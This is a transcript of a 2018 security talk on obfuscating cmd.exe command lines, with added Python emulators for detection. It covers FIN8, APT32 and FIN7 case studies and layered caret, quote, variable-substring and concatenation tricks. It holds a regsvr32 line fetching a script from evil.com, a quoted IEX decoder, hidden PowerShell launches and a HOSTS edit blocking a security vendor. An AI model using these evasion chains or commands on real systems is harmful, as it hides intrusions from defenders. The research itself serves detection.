Invoke-DOSfuscation (slide deck transcript, 2018-03-23)
![Page 1: Invoke-DOSfuscation](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/1.jpg)
Invoke-DOSfuscation: Techniques FOR %F IN (-style) DO (S-level CMD Obfuscation)
Daniel Bohannon (@danielhbohannon)
Senior Applied Security Researcher
Mandiant, A FireEye Company
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
• Daniel Bohannon
• Title :: Senior Applied Security Researcher
• Team :: Advanced Practices Team @ Mandiant/FireEye
• Twitter :: @danielhbohannon
• Blog :: http://danielbohannon.com
• Projects
  • Invoke-Obfuscation & Invoke-CradleCrafter
  • Revoke-Obfuscation (w/@Lee_Holmes)
  • Invoke-DOSfuscation
C:\> """who""am"i
DISCLAIMER: Case studies and examples are drawn from our experiences and activities working for a variety of customers, and do not represent our work for any one customer or set of customers. In many cases, facts have been changed to obscure the identity of our customers and individuals associated with our customers.
OUTLINE
State of the Union Obfuscation
Obfuscation in the Wild: 3 Case Studies
Whose Binary is it Anyway: Obfuscating Binary Names
Deep Dive: Character Insertion Obfuscation
Deep(er) Dive: Advanced Payload Obfuscation
Invoke-DOSfuscation Public Release & Live Demo
Detecting DOSfuscation
C:\> State of the Union Obfuscation
State of Obfuscation [Red Team]
• Why Obfuscate?
  • Evade static (and some dynamic) detections
  • Increase work for defenders
• How Extensive?
  • Some obfuscation framework exists for almost any scripting language that attackers like to use
• Slowing down?
  • Not any time soon (but I may be biased)
State of Obfuscation [Blue Team]
• Additional Host-Based Visibility
  • AMSI: Antimalware Scan Interface
  • ETW: Event Tracing for Windows
• Signature-less Detection Approaches
  • Revoke-Obfuscation (AST-based PowerShell obfuscation detection framework)
• Room for improvement?
  • Absolutely, because attackers are responding by…
State of Obfuscation [Attacker Response]
• Choosing softer targets
• Disabling defensive visibility
  • AMSI, ETW, anti-forensics
• Using languages that do not provide good visibility
  • JavaScript (quieter than PowerShell, but still subject to AMSI)
    • AMSI visibility applies if it is run via Windows Script Host (VBS or JScript)
  • C# (msbuild.exe all the things)
  • Custom binaries (because application whitelisting is still uncommon)
State of Obfuscation [My Response]
• What is this talk?
  • NOT PowerShell (well, not entirely)
  • Cmd.exe obfuscation
  • Cmd.exe visibility
    • Command line arguments
    • Parent/child process relationships
    • Source of action on registry, files, etc.
But why an entire framework for cmd.exe obfuscation?
C:\> Obfuscation in the Wild: 3 Case Studies
Obfuscation in the Wild
• June 30, 2017
• Co-authored blog post with Nick Carr (@itsreallynick)
• Outlines three different obfuscation techniques that Mandiant consultants observed three threat actors using:
  • Feb 2017 :: FIN8
  • Apr 2017 :: APT32 (OceanLotus, Vietnam)
  • Jun 2017 :: FIN7 (Carbanak)
Case Study #1: FIN8
• February 2017
• Process-level environment variables + PowerShell StdIn (launched from a macro)
cmd /c echo %_MICROSOFT_UPDATE_CATALOG% | %_MICROSOFT_UPDATE_SERVICE%
  %_MICROSOFT_UPDATE_SERVICE% (the consumer side of the pipe) resolves to PowerShell reading its commands from StdIn:
powershell -
  %_MICROSOFT_UPDATE_CATALOG% resolves to the decoder that is echoed into it, which in turn reads its ciphertext (_CT), start offset (_PA) and step (_KE) from three more process-level variables:
$s=$Env:_CT;$o='';$l=$s.length;$i=$Env:_PA%$l;while($o.length -ne$l){$o+=$s[$i];$i=($i+$Env:_KE)%$l}iex($o)
Case Study #2: APT32 (OceanLotus)
• April 2017
• Caret and un-paired double quotes in regsvr32.exe arguments
  • /i:^h^t^t^p (does not show up in regsvr32.exe arguments: cmd.exe consumes the carets before the child process is created)
  • /i:"h"t"t"p (DOES show up in regsvr32.exe arguments; there must be an even number of quotes)
Screenshot: Host Investigative Platform (HIP) capturing real-time attacker activity during a Mandiant incident response engagement for APT32 activity
Case Study #3: FIN7 (Carbanak)
• June 2017
• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document
• Process-level environment variables + cmd.exe StdIn
• JavaScript encoding & concatenation:
  • "Wor"+"d.Application" and [String.fromCharCode(101)+'va'+'l'] (i.e. "eval")
Case Study #3: FIN7 (Carbanak): the cmd.exe stage, step by step
• Starting point: the payload is parked in a process-level env var and fed to a child cmd.exe via StdIn
cmd.exe /c set x=wscript /e:jscript … echo %x%|cmd
  Because x does not exist yet when the outer cmd.exe parses this line, %x% is left as literal text; echo sends the literal string %x% down the pipe, and only the child cmd.exe (which inherits x) expands it. The wscript command line never appears in the outer cmd.exe's arguments.
• Garbage delimiter: a character that cannot occur in the payload is inserted into the stored value, breaking any string signature on the SET statement
cmd.exe /c set x=wsc@ript /e:js@cript … echo %x%|cmd
• Delimiter removal: env var substitution syntax strips it again at expansion time (%x:@=% replaces every @ with nothing), again inside the child
cmd.exe /c set x=wsc@ript /e:js@cript … echo %x:@=%|cmd
Case Study #3: FIN7 (Carbanak) ("Is there more here?")
• Timeline
  • Wed :: June 28, 2017 – Nick Carr (@itsreallynick) finds FIN7 testing payload
  • Thu :: June 29, 2017 – We write blog post
  • Fri :: June 30, 2017 – We publish blog post
  • Sat/Sun :: July 1-2, 2017 – I write and release POC: Out-FINcodedCommand
Implications of This Research
• These obfuscation techniques affect:
  • Dynamic detections
    • Arguments, parent/child relationship, env var, stdin
  • Static detections
    • All of the above + so much more
  • CFP submissions ☺
(Meme: "So you think event logs deobfuscate cmd args? Please, tell me more about your testing.")
Implications of This Research: stacking the techniques
• Plain command:
cmd.exe /c "echo Invoke-DOSfuscation"
• Payload split across env vars and reassembled with CALL (which re-expands its arguments, so the %D%%B%%O% left literal by the first parse is resolved):
cmd.exe /c "set O=fuscation&set B=oke-DOS&&set D=echo Inv&&call %D%%B%%O%"
• Binary name built from an env var substring (cm + %windir:~-4,-3%, which is "d", + .exe), plus carets and ",;" garbage delimiters throughout:
cm%windir:~ -4, -3%.e^Xe,;^,/^C",;,S^Et ^ ^o^=fus^cat^ion&,;,^se^T ^ ^ ^B^=o^ke-D^OS&&,;,s^Et^ ^ d^=ec^ho I^nv&&,;,C^Al^l,;,^%^D%^%B%^%o^%"
• Binary name carved out of internal-command output with FOR /F (token 4 of the "assoc .cdxml" output, split on i and l, is "Cmd"):
FOR /F "delims=il tokens=+4" %Z IN ('assoc .cdxml') DO %Z ,;^,/^C",;,S^Et ^ ^o^=fus^cat^ion&,;,^se^T ^ ^ ^B^=o^ke-D^OS&&,;,s^Et^ ^ d^=ec^ho I^nv&&,;,C^Al^l,;,^%^D%^%B%^%o%"
• The same, padded with whitespace, commas and semicolons; the carets inside the IN ('…') command are doubled because that string is parsed a second time when it runs:
^F^oR , , , , , ; ; /^f ; ; ; ; ; , " delims=il tokens= +4 " ; ; ; , , , , %Z ; , , , , ^In , , ; ; , , , ( , ; ; ; ' , , , , , ; ^^a^^S^^s^^oC ; , , , , ; .c^^d^^xm^^l ' ; , , , , ) , , , , ; , ^d^o , , , , , , , %Z , ; ^ ,/^C" , ; , S^Et ^ ^o^=fus^cat^ion& , ; , ^se^T ^ ^ ^B^=o^ke-D^OS&& , ; , s^Et^ ^ d^=ec^ho I^nv&& , ; , C^Al^l , ; , ^ %^D%^%B%^%o%"
C:\> Whose Binary is it Anyway: Obfuscating Binary Names
Whose Binary is it Anyway: Obfuscating Binary Names
• Rename/copy cmd.exe
• Cmd.exe substitutes (kind of)
  • forfiles.exe (@vector_sec)
  • pcalua.exe
  • scriptrunner.exe (@KyleHanslovan -- Win10+)
  • https://gist.github.com/api0cradle/8cdc53e2a80de079709d28a2d96458c2
• Syntactical obfuscation of legitimate binary name?
Whose Binary is it Anyway: Obfuscating Binary Names
• Env var encoding
  • Nothing new
  • Resolves on the command line (the child process's arguments show the decoded name)
C:\> echo %ProgramData%
C:\ProgramData
C:\> echo %ProgramData:~0,1%%ProgramData:~9,2%
CmD
C:\> %ProgramData:~0,1%%ProgramData:~9,2%        (resolves to: CmD)
C:\> %ProgramData:~3,1%%ProgramData:~5,1%we%ProgramData:~7,1%she%Public:~12,1%%Public:~12,1%        (resolves to: Powershell)
Whose Binary is it Anyway: Obfuscating Binary Names
• Something that does NOT resolve on the command line (i.e. internal commands, whose output exists only inside cmd.exe)
  • SET
  • ASSOC
  • FTYPE
Whose Binary is it Anyway: Obfuscating Binary Names
• Using SET to produce the string PowerShell
PSModulePath=C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules
Required (case-sensitive) delimiters are: s and \
Splitting that line on s and \ yields 13 tokens (PSModulePath=C: | Program File | Window | PowerShell | Module | ;C: | Window | y | tem32 | Window | PowerShell | v1.0 | Module); token 4 is PowerShell, which FOR /F hands to %a and then executes:
cmd.exe /c "FOR /F "delims=s\ tokens=4" %a IN ('set^|findstr PSM')DO %a"
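The FOR /F carving above (token 4 of the PSModulePath line) and the "assoc .cdxml" variant used elsewhere in the deck rely on the same tokenising rules. The Python emulator below is an added example written for this transcript, not code from Invoke-DOSfuscation; the two sample output lines are constructed from the values the slides show (the .cdxml association string is assumed to be the default Windows 10 value, verify with assoc .cdxml), and for_f_tokens / for_f_carve are names chosen here.

```python
"""FOR /F token carving emulator (added example, not from the talk).

cmd.exe's FOR /F splits each line of a command's output on the characters in
delims= (case-sensitive; runs of delimiters collapse; empty tokens vanish), skips
lines whose first character is the eol= character (default ;), and binds the
selected token to the loop variable. Because SET, ASSOC and FTYPE are cmd.exe
internals, the carved binary name never appears on any process command line.
"""


def for_f_tokens(line, delims=' \t', eol=';'):
    """Tokens FOR /F would produce for one line of output."""
    if eol and line.startswith(eol):
        return []                      # eol character: whole line skipped
    tokens, cur = [], []
    for ch in line:
        if ch in delims:               # case-sensitive membership test
            if cur:
                tokens.append(''.join(cur))
                cur = []
        else:
            cur.append(ch)
    if cur:
        tokens.append(''.join(cur))
    return tokens


def for_f_carve(output_lines, delims, token):
    """Value the loop variable takes for tokens=N (1-based) on the first output
    line that has at least N tokens; None if no line yields it."""
    for line in output_lines:
        toks = for_f_tokens(line, delims)
        if len(toks) >= token:
            return toks[token - 1]
    return None


# Constructed sample outputs: what `assoc .cdxml` and `set | findstr PSM` print on
# a default Windows 10 install (assumption taken from the slides, not captured here).
ASSOC_CDXML = ['.cdxml=Microsoft.PowerShellCmdletDefinitionXML.1']
SET_PSM = [r'PSModulePath=C:\Program Files\WindowsPowerShell\Modules;'
           r'C:\Windows\system32\WindowsPowerShell\v1.0\Modules']

if __name__ == '__main__':
    # FOR /F "delims=il tokens=4" %Z IN ('assoc .cdxml') DO %Z
    print(for_f_carve(ASSOC_CDXML, 'il', 4))
    # FOR /F "delims=s\ tokens=4" %a IN ('set^|findstr PSM') DO %a
    print(for_f_carve(SET_PSM, 's\\', 4))
    # all 13 tokens of the PSModulePath line, numbered as on the slide
    for n, tok in enumerate(for_f_tokens(SET_PSM[0], 's\\'), 1):
        print(n, tok)
```

Running it against real output is a one-line change: replace the constructed lists with the lines from subprocess.run(['cmd', '/c', 'assoc .cdxml'], capture_output=True, text=True).stdout.splitlines() on a Windows host.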
C:\> Deep Dive: Character Insertion Obfuscation
Deep Dive: Character Insertion Obfuscation
• Typically more useful for evading static analysis detections rather than dynamic detections
• Caret escape character (^)
"C:\WINDOWS\system32\cmd.exe" /c P^o^w^e^r^S^h^e^l^l^.^e^x^e^ -NoExit -Exec Bypass -EC IAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHk…
• Double quotes, evenly balanced ("")
regsvr32.exe /s /n /u /i:"h"t"t"p://<REDACTED>.jpg scrobj.dll
• Encapsulating parentheses
• Leading & trailing special characters
,cmd;/ccalc
• Standard input argument hiding
cmd /c echo calc|cmd
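A detection-side view of the caret, quote and leading-separator tricks listed above, as an added example (not from the talk or from Invoke-DOSfuscation): cmd_view models what cmd.exe passes to CreateProcess, which is also the string a process-creation event records, and argv_view what the child's own argument parser leaves. The sample lines are constructed from the slide's examples with a placeholder host; backslash-escaped quotes and the , ; = separators between arguments are deliberately not modelled.

```python
"""Character-insertion normaliser: added example, not code from the talk.

Two views of one obfuscated cmd.exe line:
  cmd_view(line)  what cmd.exe hands to CreateProcess (and what a process-creation
                  event records): unquoted carets are consumed, each escaping the
                  character after it; double quotes are passed through untouched.
  argv_view(line) what the child's own argument parser leaves: the quote characters
                  are gone as well (backslash-escaped quotes are not modelled).
Hence /i:^h^t^t^p never reaches regsvr32.exe's arguments, while /i:"h"t"t"p does.
"""


def cmd_view(line):
    out, in_quote, i = [], False, 0
    while i < len(line):
        ch = line[i]
        if ch == '"':
            in_quote = not in_quote      # inside quotes a caret is a literal character
            out.append(ch)
        elif ch == '^' and not in_quote:
            i += 1                       # drop the caret, keep whatever it escaped
            if i < len(line):
                out.append(line[i])
        else:
            out.append(ch)
        i += 1
    return ''.join(out)


def argv_view(line):
    return cmd_view(line).replace('"', '')


def quotes_balanced(line):
    """An odd number of quotes flips parsing for the rest of the line
    (slide: "must be even number of quotes")."""
    return line.count('"') % 2 == 0


def strip_leading_separators(line):
    """cmd.exe skips , ; = and whitespace before the command name (',cmd;/ccalc'
    still runs cmd). Only the leading run is handled: the same characters are
    meaningful later in the line, inside %var:~a,b% and set x=y."""
    return line.lstrip(' \t,;=')


def signature_hits(line, needle):
    """Case-insensitive substring match against the raw line and both normalised
    views, i.e. which layer a string signature has to be evaluated on."""
    needle = needle.lower()
    return {
        'raw': needle in line.lower(),
        'cmd': needle in cmd_view(line).lower(),
        'argv': needle in argv_view(line).lower(),
    }


# Constructed samples modelled on the slide's examples (host name is a placeholder).
CARET_SAMPLE = 'P^o^w^e^r^S^h^e^l^l^.^e^x^e^ -NoExit -Exec Bypass -EC'
QUOTE_SAMPLE = 'regsvr32.exe /s /n /u /i:"h"t"t"p://example.invalid/x.jpg scrobj.dll'
LEADING_SAMPLE = ',cmd;/ccalc'

if __name__ == '__main__':
    for sample in (CARET_SAMPLE, QUOTE_SAMPLE, LEADING_SAMPLE):
        cleaned = strip_leading_separators(sample)
        print('raw :', sample)
        print('cmd :', cmd_view(cleaned))
        print('argv:', argv_view(cleaned))
        print('balanced quotes:', quotes_balanced(sample))
    print(signature_hits(CARET_SAMPLE, 'powershell'))
```

The practical consequence for detection content: a rule on the raw LNK/macro string must tolerate carets and quotes, a rule on the child's logged command line only has to tolerate quotes, and a rule keyed on the parent cmd.exe's own command line sees everything still obfuscated.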
Deep Dive: Character Insertion Obfuscation
• Typically more useful for evading static analysis detections rather than dynamic detections
• Nonexistent env vars (batch files): in a batch file an undefined variable expands to nothing, so the inserted %a%, %b% and %c% simply vanish
  • https://marcin-chwedczuk.github.io/obfuscating-windows-batch-files
echo "Find Evil!"        ec%a%ho "Fi%b%nd Ev%c%il!"
• Custom env vars (here with delayed expansion enabled by /V, so !p! is resolved when the statement runs rather than when the line is parsed)
..\..\..\WINDOWS\system32\cmd.exe /V /K set p=p&&!p!owershell -w hidden -c "IEX ((('Q0zF='+'Q0z'+'env:T'+'emp+'+'zARYUEyjv'…
• Existing env vars
C:\> echo %ProgramData%
C:\ProgramData
C:\> echo %ProgramData:~0,1%%ProgramData:~9,2%
CmD
Deep Dive: Character Insertion Obfuscation
• Out-FINcodedCommand POC
  • A few binary syntax options with environment variable character substitution
Deep Dive: Character Insertion Obfuscation (ITW 1/3)
• Env var encoding in the wild
  • SHA-256: 661877d416f34411fad7e22246ee0d61d14de3065a34b0a7b2f28052d56db6e2
%comspec:~-16,1%%comspec:~-1%%comspec:~-13,1%
  decodes to: set
Deep Dive: Character Insertion Obfuscation (ITW 2/3)
• Env var encoding in the wild
  • SHA-256: 9e1df42f00829d16afd97c575f08da45467bbcab92ca5e3d2832a009dddaa8a7
  • Obfuscator: https://github.com/guillaC/JSBatchobfuscator
  • Technique: set the full alphabet in a custom env var, then assemble the payload from single-character substrings of it (screenshot shows the sample alongside its decoded form)
Deep Dive: Character Insertion Obfuscation (ITW 3/3)
• Env var encoding in the wild
  • SHA-256: 761483906b45fad51f3c7ab66b1534dee137e93a52816aa270bc97249acb56d0 (see white paper!)
  • Technique: set an env var named ' (single quote) from substrings of known env vars, then assemble the payload as substrings of the newly-set ' env var
C:\> Deep(er) Dive: Advanced Payload Obfuscation
Deep(er) Dive: Advanced Payload Obfuscation
• %COMSPEC% /b /c start /b /min netstat -ano | findstr LISTENING
  • cmd.exe setup portion :: %COMSPEC% /b /c start /b /min
  • rest of the command :: netstat -ano | findstr LISTENING
• Breakdown
  • %COMSPEC% :: env var for "C:\Windows\system32\cmd.exe" (27 chars)
  • /b :: described on the slide as exiting cmd.exe to the calling program with the specified exit code; note that cmd /? documents no /b switch (that is the syntax of EXIT /B)
  • /c :: remainder of command line processed as a command
  • start :: execute remaining command without waiting for it to finish
  • start /b :: start the application without creating a new window
  • /min :: start window minimized
• Env var substring: each of these expands to the full 27-character COMSPEC value (a negative offset counts from the end; offsets and lengths past either end are clipped)
  • %COMSPEC:~0%
  • %COMSPEC:~0,27%
  • %COMSPEC:~-27%
  • %COMSPEC:~-27,27%
  • %COMSPEC:~0,1337%
  • %COMSPEC:~-1337%
  • %COMSPEC:~-1337,1337%
• Env var substitution: the search is case-insensitive, no match leaves the value unchanged, and a leading * also drops everything before the first match
  • %COMSPEC:\=/%  (C:/Windows/system32/cmd.exe, which still executes)
  • %COMSPEC:KeepMatt=Happy%  (no match, unchanged)
  • %COMSPEC:*System32\=%  (cmd.exe)
  • %COMSPEC:*Tea=Coffee%  (no match, unchanged)
• Chosen for the walkthrough
  • Env var substring :: %COMSPEC:~0,27%
  • Env var substitution :: %COMSPEC:\=/%
Deep(er) Dive: Advanced Payload Obfuscation (slides 63–66)
• %coMSPec: \ = / % /b /c start /b /min netstat -ano | findstr LISTENING
• Random case :: %coMSPec:~0,27% and %coMSPec:\=/% (variable names are case-insensitive)
• Whitespace :: %coMSPec:~ 0, 27% and %coMSPec: \ = / % (the offsets tolerate padding; in the substitution the padded " \ " is simply a pattern that never matches, so the value comes back unchanged)
• Explicit signing :: %coMSPec:~ -0, +27%
• Put together, the binary token becomes %coMSPec: \ = / %, which still resolves to C:\Windows\system32\cmd.exe
Deep(er) Dive: Advanced Payload Obfuscation (slide 67)
• %coMSPec: \ = / % /b /c start /b /min netstat -ano | findstr LISTENING
• Context is crucial: the substring/substitution syntax is a cmd.exe feature, so whether the payload runs depends on what launches it
  • ✔ Cmd.exe
  • ✔ WScript.Shell
  • ✘ Service
  • ✘ Run key
  • ✘ Scheduled task
Deep(er) Dive: Advanced Payload Obfuscation (slides 68–74)
• Random case :: %coMSPec: \ = / % /B /c sTArt /b /mIN neTSTat -aNo | fiNDstr LISTENING
• Whitespace (-) :: %coMSPec: \ = / %/B/csTArt/b/mIN neTSTat -aNo|fiNDstr LISTENING
  • Child process: C:\Windows\system32\cmd.exe /B/csTArt/b/mIN neTSTat -aNo
  • NOTE: even though the source has no space there, cmd.exe cuts the command token from what follows it and a single whitespace is added between the image path and the process arguments.
• netstat's -ano arg reordering :: %coMSPec: \ = / %/B/csTArt/b/mIN neTSTat -Noa|fiNDstr LISTENING
• Whitespace (+) :: %coMSPec: \ = / % /B /c sTArt /b /mIN neTSTat -Noa | fiNDstr LISTENING
• Comma & semicolon :: ,;,%coMSPec: \ = / %,;,/B,;,/c,;,sTArt,;,/b ,;/mIN ,;neTSTat -Noa |,;,fiNDstr LISTENING
• Caret :: ,;,%coMSPec:^^^^\^^^^=^^^^/^^^^%^ ,;,^^^^/^^^^B^^^^,;,^^^^/^c,;,^^sT^^Art^^,;,/^^^^b ^^^^ ,;/^^^^mIN^^^^ ,;neT^^^^STat ^^^^ ^^^^-N^^^^oa ^^^^ ^|,;,fi^^^NDstr LIST^^^ENING
• Let's look at process execution layers & respective arguments!
Deep(er) Dive: Advanced Payload Obfuscation (slides 75–77)
• Process execution layers for the caret-obfuscated command (each cmd.exe parse consumes one layer of carets: ^^^^ → ^^ → ^ → none):
  1. Child spawned by the first cmd.exe parse: C:\Windows\system32\cmd.exe ,;,^^/^^B^^,;,^^/c,;,^sT^Art^,;,/^^b ^^ ,;/^^mIN^^ ,;neT^^STat ^^ ^^-N^^oa ^^ |,;,fi^NDstr LIST^ENING
  2. That cmd.exe runs each side of the pipe in a fresh instance: C:\Windows\system32\cmd.exe /S /D /c" sTArt,;,/^b ^ ,;/^mIN^ ,;neT^STat ^ ^-N^oa ^ "
  3. Final processes: neTSTat -Noa and fiNDstr LISTENING
• , ; and ^ do NOT persist into the final netstat & findstr commands. Is there another obfuscation character?
• YES! Double quotes. Pairing "" inside a token (neT^^^^ST""at ^^^^ ^^^^-N^^^^o""a … fi^^^ND""str LIST^^^EN""ING) survives every layer:
  1. C:\Windows\system32\cmd.exe ,;,^^/^^B^^,;,^^/c,;,^sT^Art^,;,/^^b ^^ ,;/^^mIN^^ ,;neT^^ST""at ^^ ^^-N^^o""a ^^ |,;,fi^ND""str LIST^EN""ING
  2. C:\Windows\system32\cmd.exe /S /D /c" sTArt,;,/^b ^ ,;/^mIN^ ,;neT^ST""at ^ ^-N^o""a ^ "
  3. neTST""at -No""a and fiND""str LISTEN""ING
• Double quotes are widely-accepted obfuscation characters: cmd.exe passes them through and they are dropped only by the final process's own command-line parsing. (, ; and ^ are binary-specific: cmd.exe consumes them, so they never reach netstat or findstr.)
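The %COMSPEC% substring/substitution forms of slides 57–66 and the caret layers of slides 68–77 can be replayed offline. The block below is an added example written for this transcript; it is not code from the deck or from Invoke-DOSfuscation. The environment is constructed (only COMSPEC is defined) and the parser models just the cmd.exe rules the slides depend on: phase-1 %VAR% expansion with substring/substitution, one caret pass per cmd.exe instance with a split at unescaped pipes, the command-token cut that produces the "single whitespace" of slide 69, and the quote-stripping argv parse of the final binary. Every function and constant name is this example's own.

```python
"""Model of the cmd.exe parsing layers used on slides 57-77 (added example; not
Invoke-DOSfuscation code). Constructed environment, and only the rules the
slides rely on:
  phase 1  %VAR%, %VAR:~start,len%, %VAR:old=new%, %VAR:*old=new%; names and
           matches are case-insensitive, offsets accept padding and signs,
           out-of-range offsets are clamped, an undefined %name% stays literal
  phase 2  one caret pass (^x -> x, hence ^^ -> ^; carets inside "..." stay)
           and a split at unescaped, unquoted '|'
  launch   the command token ends at whitespace or , ; = / + [ ] ( and the
           child gets <image> <one space> <rest> (slide 69's added whitespace)
  argv     the final binary's own parsing removes quote characters, so ""
           vanishes only there
"""
import re

ENV = {"COMSPEC": r"C:\Windows\system32\cmd.exe"}   # constructed; 27 characters

_VAR = re.compile(r"%([^%:]+)(?::([^%]*))?%")
_TOKEN_END = re.compile(r"[\s,;=/+\[\]()]")

def expand_var(name, spec, env):
    """Resolve one %name...% reference; None means 'undefined, leave it literal'."""
    value = env.get(name.upper())
    if value is None or spec is None:
        return value
    if spec.startswith("~"):                              # substring form
        start_s, _, len_s = spec[1:].partition(",")
        n, start = len(value), int(start_s.strip() or "0")
        start = max(n + start, 0) if start < 0 else min(start, n)
        if not len_s.strip():
            return value[start:]
        length = int(len_s.strip())
        end = start + length if length >= 0 else n + length
        return value[start:max(end, start)]
    old, _, new = spec.partition("=")                     # substitution form
    if not old:
        return None
    if old.startswith("*"):                               # *old also drops the prefix
        idx = value.lower().find(old[1:].lower())
        return value if idx < 0 else new + value[idx + len(old) - 1:]
    return re.sub(re.escape(old), lambda _m: new, value, flags=re.I)

def expand_line(line, env=ENV):
    """Phase 1: expand every %...% reference on a command line."""
    def repl(m):
        out = expand_var(m.group(1), m.group(2), env)
        return m.group(0) if out is None else out
    return _VAR.sub(repl, line)

def caret_pass(text):
    """Phase 2: consume one layer of carets; return the pipeline's commands."""
    commands, cur, quoted, i = [], [], False, 0
    while i < len(text):
        c = text[i]
        if c == '"':
            quoted = not quoted
        elif c == "^" and not quoted and i + 1 < len(text):
            i += 1                                        # keep the escaped char as-is
            c = text[i]
        elif c == "|" and not quoted:
            commands.append("".join(cur))
            cur, i = [], i + 1
            continue
        cur.append(c)
        i += 1
    commands.append("".join(cur))
    return commands

def child_command_line(command):
    """Command line handed to the child: leading delimiters dropped, command token
    cut at its first terminator, exactly one space before the remainder."""
    command = command.lstrip(" \t,;=")
    m = _TOKEN_END.search(command)
    if m is None:
        return command
    image, rest = command[:m.start()], command[m.start():].lstrip(" \t")
    return f"{image} {rest}" if rest else image

def cmd_layer(line, env=ENV):
    """One cmd.exe parse of `line`: the child command line(s) it launches."""
    return [child_command_line(seg) for seg in caret_pass(expand_line(line, env))]

def after_layers(fragment, passes):
    """Apply `passes` successive cmd.exe caret passes to a pipe-free fragment."""
    for _ in range(passes):
        fragment = caret_pass(fragment)[0]
    return fragment

def argv_view(cmdline):
    """Simplified CommandLineToArgvW: split on unquoted whitespace and drop the
    quote characters, so neTST""at -No""a arrives as ['neTSTat', '-Noa']."""
    args, cur, quoted = [], [], False
    for c in cmdline:
        if c == '"':
            quoted = not quoted
        elif c in " \t" and not quoted:
            if cur:
                args.append("".join(cur))
                cur = []
        else:
            cur.append(c)
    if cur:
        args.append("".join(cur))
    return args
```

cmd_layer() applied to the slide-74 line reproduces the slide-75 child command line character for character, and applied to the slide-69 line it yields the "C:\Windows\system32\cmd.exe /B/csTArt..." form with the added space. after_layers() shows the ^^^^ → ^^ → ^ → nothing progression across the three cmd.exe instances, and argv_view() shows why "" disappears only inside netstat's own argument parsing. The model deliberately stops short of cmd.exe's switch parsing and of start's argument handling, which the slides treat empirically.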
Deep(er) Dive: Advanced Payload Obfuscation (slides 78–79)
• Invoke-DOSfuscation supports and randomizes all of these obfuscation components
• For obfuscating final cmdline arguments:
  • The user-input command (e.g. netstat -ano) must be obfuscated manually (, ; ^ "" etc.)
  • Invoke-DOSfuscation handles all layers of escaping for the input obfuscation characters
• INSANELY complicated in certain scenarios, especially since there is no tokenizer for cmd.exe like there is for PowerShell.
Deep(er) Dive: Advanced Payload Obfuscation (slides 80–81)
• What cmd.exe commands do attackers use that do NOT create child processes? (These are cmd.exe internal commands: they run inside the cmd.exe process itself, so process-creation telemetry sees only the cmd.exe command line, obfuscation included, and no child.)
• File copy: cmd /c copy powershell.exe benign.exe
• File deletion: cmd /c del benign.exe
• File creation: cmd /c "echo LINE1 > bad.vbs&&echo LINE2 >> bad.vbs"
• File read: cmd /c type HOSTS
• File modification: cmd /c "echo 127.0.0.1 cloud.security-vendor.com >> HOSTS"
• File listing: cmd /c dir "C:\Program Files\*"
• Dir creation: cmd /c mkdir %PUBLIC%\Recon
• Symbolic link creation: cmd /c mklink ClickMe C:\Users\Public\evil.exe
Deep(er) Dive: Advanced Payload Obfuscation (slide 82)
• Perhaps your target is monitoring for carets, commas, semicolons, etc.
• What additional obfuscation options does cmd.exe give us? Four, introduced one at a time below, starting with "Payload Obfuscation 1 of 4".
Payload Obfuscation 1 of 4: Concatenation (slides 83–92)
• cmd /c netstat -ano  →  cmd /c netstat /ano
• - and / interchangeability :: many Windows binaries accept either switch prefix, so every switch is a token that can be rewritten. More examples:
  • wscript.exe /nologo …  →  wscript.exe -nologo …
  • powershell.exe -nop -noni -enc …  →  powershell.exe /nop /noni /enc …
  • regsvr32.exe /s /n /u /i:https://evil.com/a scrobj.dll  →  regsvr32.exe -s -n -u -i:https:\\evil.com\a scrobj.dll (the slashes inside the URL are flipped as well)
Payload Obfuscation 1 of 4: Concatenation (slides 93–96)
• cmd /c "set com=netstat /ano&&echo %com%"
• cmd /c "set com=netstat /ano&&call %com%"
• Why call: cmd.exe expands %com% once, when it parses the whole line and before set has run, so on the command line the still-undefined %com% is left as literal text. call re-parses its arguments, which expands %com% a second time (now that it is set) and then executes the result.
Payload Obfuscation 1 of 4: Concatenation (slides 97–98)
• cmd /c "set com1=net&&set com2=stat&&set com3= /ano&&call %com1%%com2%%com3%"
• DETOUR :: #TestYourTools
  • Sysmon EID 1 CommandLine adds duplicate %'s: the logged line reads %%com1%%%%com2%%%%com3%% where the process received %com1%%com2%%com3%
  • EventVwr.exe
  • PowerShell's Get-WinEvent
  • http://www.danielbohannon.com/blog-1/2018/3/19/test-your-dfir-tools-sysmon-edition
Payload Obfuscation 1 of 4: Concatenation (slides 99–101)
• Reorder substrings :: cmd /c "set com3= /ano&&set com2=stat&&set com1=net&&call %com1%%com2%%com3%"
• Set into single final env var :: cmd /c "set com3= /ano&&set com2=stat&&set com1=net&&call set final=%com1%%com2%%com3%&&call %final%"
  • call set is needed for the same reason as call %final%: %com1%%com2%%com3% is expanded when the line is parsed, before the set commands have run, so only the re-parse performed by call sees the new values.
Payload Obfuscation 1 of 4: Concatenation (slides 102–107)
• cmd /c "set com3= /ano&&set com2=stat&&set com1=net&&call set final=%com1%%com2%%com3%&&call %final%"
• Final syntax :: Invoke-DOSfuscation arguments
  1. call %final% :: (default when possible)
  2. cmd /c %final% :: -FinalBinary cmd
  3. call echo %final% | cmd :: -FinalBinary cmd -StdIn
  4. call powershell "%final%" :: -FinalBinary PowerShell
  5. call echo %final% | powershell - :: -FinalBinary PowerShell -StdIn
Payload Obfuscation 1 of 4: Concatenation (slides 108–114)
• cmd /c "set com3= /ano&&set com2=stat&&set com1=net&&call set final=%com1%%com2%%com3%&&call %final%"
• Invoke-DOSfuscation functions also wrap all the building block techniques into each input command…
• Random case :: CMd /C "sEt coM3= /ano&&SEt cOm2=stat&&seT CoM1=net&&caLl SeT fiNAl=%COm1%%cOm2%%coM3%&&cAlL %FinAl%"
• Whitespace (-) :: CMd/C"sEt coM3= /ano&&SEt cOm2=stat&&seT CoM1=net&&caLl SeT fiNAl=%COm1%%cOm2%%coM3%&&cAlL %FinAl%"
• Whitespace (+) :: CMd /C " sEt coM3= /ano&& SEt cOm2=stat&& seT CoM1=net&& caLl SeT fiNAl=%COm1%%cOm2%%coM3%&& cAlL %FinAl% "
